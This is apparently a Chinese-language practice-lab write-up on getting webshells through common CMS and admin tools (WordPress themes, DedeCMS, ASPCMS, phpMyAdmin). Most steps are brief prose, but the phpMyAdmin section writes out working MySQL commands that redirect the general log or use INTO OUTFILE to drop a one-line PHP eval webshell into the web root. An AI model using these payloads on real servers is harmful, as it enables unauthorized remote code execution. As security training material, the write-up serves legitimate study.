常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin)

练习一:wordpress漏洞测试

1.上传包含木马的主题

安装网站

登陆网站 上传主题处测试漏洞注入

在上传主题模板压缩包中写入一句话木马

网站上传含有木马的zip压缩包

上传成功

wordpress主题目录 wp-content/themes 访问上传木马测试

2.修改主题的配置文件为含有木马的文件

练习2:DedeCMS-V5.7.82-UTF8 漏洞测试

安装网站
登录后台管理网站
1.通过文件管理器上传webshell
2.修改模板文件拿webshell

浏览主页 内容为所写入的phpinfo

3.后台任意命令执行拿webshell

查看添加广告路径

找到路径

进行木马连接

4.通过后台sql命令执行拿webshell

查看文件属性 发现是刚才写入的文件

进行木马连接

练习3:ASPCMS漏洞测试

登录网站后台

再访问网站后台

抓包

抓包修改 写入一句话木马 放行 页面修改成功

配置文件中写入了一句话木马

木马连接

练习4:PHPMyAdmin漏洞测试

网站根目录下更新了目录

访问网站 数据库账户密码 登录

1.界面图形化getshell
2.通过日志文件getshell
复制代码
show global variables like '%general%';

查看 状态 (同样也可以在这里进行命令也可以修改日志位置)

复制代码
set global general_log='on';
set global general_log_file = 'D:/phpstudy_pro/WWW/111.php'

写入一句话木马

复制代码
select '<?php eval($_POST[cmd]);?>';

查看写入位置有写入文件

木马连接

3.导入导出getshell

先判断mysql位置

猜测网站路径D:/phpstudy_pro/www

写入木马文件

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/aaa.php';

进行木马连接

相关推荐
终焉暴龙王1 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川2 小时前
Apache文件解析漏洞
web安全·apache
qq_430908579 小时前
网络安全-机遇与挑战
安全
希望奇迹很安静9 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南12 小时前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
Johny_Zhao12 小时前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
安 当 加 密15 小时前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课1 天前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离
荔枝吻1 天前
软件异常读写威胁硬盘安全:从过往案例到防护之道
安全·硬盘
小马爱打代码1 天前
Spring Boot 接口安全设计:接口限流、防重放攻击、签名验证
网络·spring boot·安全